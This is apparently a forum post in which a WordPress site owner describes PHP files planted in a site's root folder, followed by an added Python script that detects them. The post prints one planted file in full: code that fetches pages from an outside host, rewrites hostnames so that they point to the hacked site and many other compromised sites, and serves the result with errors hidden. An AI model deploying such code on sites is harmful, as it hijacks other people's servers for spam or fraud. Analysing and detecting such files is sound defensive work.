Hi,
today I found many weird files in the main folder of my WordPress site.
The files were dated 28-06-2015 and 13-07-2015.
The file names start with:
- esforce
- esoakley
- esrayban
- frok
- frrb
- ithg
- itnike
- itok
- itrb
- itrb
then there is a number from the range 01-99 and the extension *.php.
Every file is almost the same:
<?php
@error_reporting(0); @ini_set("display_errors", "off");
$thissite= $_SERVER['SERVER_NAME'];
$path="/ithg[XX].php?";
$fromsite="ithg[XX].cscpe.net";
$q=$_SERVER["QUERY_STRING"];
$q=str_replace($thissite&$path&"/",$thissite&$path,$q);
$q=str_replace(".css&",".css?",$q);
$q=str_replace(".php&rsd",".php?rsd",$q);
$q=str_replace(".js&",".js?",$q);
$q=str_replace("&p=","?p=",$q);
$q=str_replace("??","?",$q);
$u="http://".$fromsite ."/". $q;
if (function_exists("curl_init")) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
curl_setopt($ch, CURLOPT_URL, $u);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20 (.NET CLR 3.5.30729)");
$str = curl_exec($ch);
curl_close($ch);
}
if ($str === false && ini_get("allow_url_fopen") == "1") {
$str = file_get_contents($u);
}
$replace_arr = array( $fromsite => $thissite.$path, 'http://http://' => 'http://', $path."/"=>$path , );
$replace_arr['ithg[XX].cscpe.net/'] = 'www.[XXXXXX].com.br/ithg[XX].php?'; // in every file there is 100 lines like this
if (stripos($q, '.css')!=false) {
$replace_arr['url( '] = 'url(';
$replace_arr['url('] = 'url('.'http://'.$thissite.$path ;
}
$replace_arr[$fromsite] = $thissite.$path;
foreach ($replace_arr as $k => $v) {
$str = str_replace($k, $v, $str);
}
$filetype_header = array('.css' => 'text/css', '.js' => 'text/javascript', '.png' => 'image/png', '.jpg' => 'image/jpg', '.jpeg' => 'image/jpeg', '.gif' => 'image/gif', '.atom' => 'application/atom+xml', '.xml' => 'text/xml', '/feed' => 'text/xml; charset=UTF-8',);
foreach ($filetype_header as $k => $v) {
if (stripos($q, $k)!=false) {
header("Content-type: $v");
break;
}
}
echo $str;
In this listing, [XX] marks data I changed - numbers or webpages.
In every file there are 100 lines like this:
$replace_arr['ithg[XX].cscpe.net/'] = 'www.[XXXXXX].com.br/ithg[XX].php?';
but with a different webpage address. I checked a few - and all of them were WordPress sites.
I tried to find something related to this site "cscpe.net" and found only this: http://www.aquaticsafetygroup.com/fr.asp - which I think may be similar but written in VB.
I deleted the files from my webserver. I've got something like 1000 URLs with these weird files. Do you know what it is and what exactly it does?
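
An added example, not part of the original post: a Python sweep of a site's top-level folder for PHP files that match the name pattern listed above and/or contain the strings visible in the posted listing (it fetches a page from `$fromsite` and echoes it with hostnames rewritten). The `MIN_MARKERS` threshold, the function names and the sample files are assumptions constructed for this example.

```python
import re
import tempfile
from pathlib import Path

# Name prefixes listed in the post, followed by a two-digit number and .php.
PREFIXES = ("esforce", "esoakley", "esrayban", "frok", "frrb",
            "ithg", "itnike", "itok", "itrb")
NAME_RE = re.compile(r"^(?:%s)\d{2}\.php$" % "|".join(PREFIXES), re.I)
# Strings taken from the posted listing; several must be present together.
MARKERS = (b"$fromsite", b"$replace_arr[", b'$_SERVER["QUERY_STRING"]',
           b"curl_exec(", b"echo $str")
MIN_MARKERS = 4  # assumption: threshold chosen for this example


def scan_docroot(docroot):
    """Flag top-level PHP files by name pattern and/or listing content."""
    findings = []
    for path in sorted(Path(docroot).glob("*.php")):
        if not path.is_file():
            continue
        data = path.read_bytes()[:512 * 1024]  # the listing is small; cap the read
        hits = sum(1 for m in MARKERS if m in data)
        name_ok = bool(NAME_RE.match(path.name))
        if name_ok and hits >= MIN_MARKERS:
            findings.append((path.name, "name+content"))
        elif hits >= MIN_MARKERS:
            findings.append((path.name, "content-only"))  # renamed copy
        elif name_ok:
            findings.append((path.name, "name-only"))  # review by hand
    return findings


def build_sample(root):
    """Constructed sample tree: matching file, renamed copy, stub, benign file."""
    proxy = ('<?php $fromsite="host.example"; $q=$_SERVER["QUERY_STRING"];\n'
             '$ch=curl_init(); $str=curl_exec($ch);\n'
             '$replace_arr[$fromsite]="x"; echo $str;')
    (root / "ithg07.php").write_text(proxy)
    (root / "wp-cache-old.php").write_text(proxy)
    (root / "itok12.php").write_text("<?php // empty placeholder")
    (root / "index.php").write_text("<?php require 'wp-blog-header.php';")
    return root


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as d:
        for name, reason in scan_docroot(build_sample(Path(d))):
            print(f"{reason:13} {name}")
```

Matching on content as well as name catches copies saved under a different file name, and comparing the modification dates of flagged files against the web server access log helps narrow down how they were written.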